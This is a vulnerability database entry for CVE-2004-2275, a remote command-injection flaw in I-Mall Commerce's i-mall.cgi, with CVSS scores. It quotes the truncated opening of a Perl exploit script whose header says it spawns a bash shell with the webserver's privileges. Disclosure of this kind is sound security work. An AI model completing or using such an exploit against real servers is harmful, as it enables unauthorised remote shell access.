10
CVSSv2

CVE-2004-2275

Published: 31/12/2004 Updated: 11/07/2017
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

i-mall.cgi in I-Mall Commerce allows remote malicious users to execute arbitrary commands via shell metacharacters via the p parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

i-mall commerce i-mall.cgi

Exploits

############################################## # I-Mall explo # Spawn bash style Shell with webserver uid # Greetz z\, spax, foxtwo, Zone-H # This Script is currently under development ############################################## use strict; use IO::Socket; my $host; my $port; my $command; my $url; my $shiz; my @results; my $probe; ...